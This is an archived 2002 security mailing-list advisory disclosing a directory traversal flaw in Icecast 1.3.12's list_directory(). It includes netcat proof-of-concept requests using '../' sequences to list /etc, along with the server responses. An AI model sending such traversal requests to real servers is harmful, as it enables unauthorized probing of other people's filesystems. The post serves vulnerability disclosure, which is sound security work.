VANED LABS: icecast filesystem disclosure

From: glaiveat_private
Date: Tue Jul 09 2002 - 11:39:03 PDT

Next message: Knud Erik Højgaard: "Re: Plain text password for Microsoft (icwip.dun)"

Previous message: ALoR: "Re: hijacking TCP connections on FreeBSD"
Next in thread: mattat_private: "Re: VANED LABS: icecast filesystem disclosure"
Reply: mattat_private: "Re: VANED LABS: icecast filesystem disclosure"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

list_directory() makes no effort to constrain the request to the static
directory.  Icecast allows for remote probing of the underlying
filesystem structure.  (on a side note, this can also be used to list
files with a .mp3 extension anywhere on the system.  send_file() does do
traversal checking.)

% nc icecast.host 8000
GET /file/../../../../../../../../nonexistent/ HTTP/1.0

HTTP/1.0 404 Not Found
Server: icecast/1.3.12
Connection: close
Content-Type: text/html

...

% nc icecast.host 8000
GET /file/../../../../../../../../etc/ HTTP/1.0

HTTP/1.0 200 OK
Server: icecast/1.3.12
Connection: close
Content-Type: text/html

...

Next message: Knud Erik Højgaard: "Re: Plain text password for Microsoft (icwip.dun)"
Previous message: ALoR: "Re: hijacking TCP connections on FreeBSD"
Next in thread: mattat_private: "Re: VANED LABS: icecast filesystem disclosure"
Reply: mattat_private: "Re: VANED LABS: icecast filesystem disclosure"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 09 2002 - 12:10:52 PDT